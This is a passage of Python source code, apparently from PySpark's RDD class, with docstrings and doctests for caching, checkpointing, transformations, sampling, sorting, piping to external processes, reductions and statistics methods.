"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be in [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
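        # Cap the requested size so the over-sampled request computed below stays safely
        # under sys.maxsize.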
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
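        # Keep the partitioner only when both parents share it and the union did not change
        # the number of partitions, i.e. no reshuffling of keys occurred.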
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts, but one of them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
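        # Route each key to the sampled range that contains it; flip the index for
        # descending sorts.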
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
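            # Feed the child's stdin from a separate thread so stdout can be read here
            # concurrently without deadlocking on full pipe buffers.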
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
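                    # The loop below never runs; it only turns check_return_code into a
                    # generator, so chaining it after stdout defers the exit-code check
                    # until all output has been consumed.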
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} are allowed to modify C{t1} and return it
as their result value to avoid object allocation; however, they should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
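        # Shrink the partition count by roughly `scale` per level, chosen so that about
        # `depth` levels of reduceByKey are performed before the final reduce.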
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1, 10, 20, 50] means the buckets are [1, 10) [10, 20) [20, 50],
i.e. 1<=x<10, 10<=x<20, 20<=x<=50. For example, given the inputs 1
and 50, the histogram would be [1, 0, 1].
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
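                # Evenly spaced buckets allow O(1) index arithmetic; otherwise fall back to
                # a binary search over the bucket boundaries.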
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
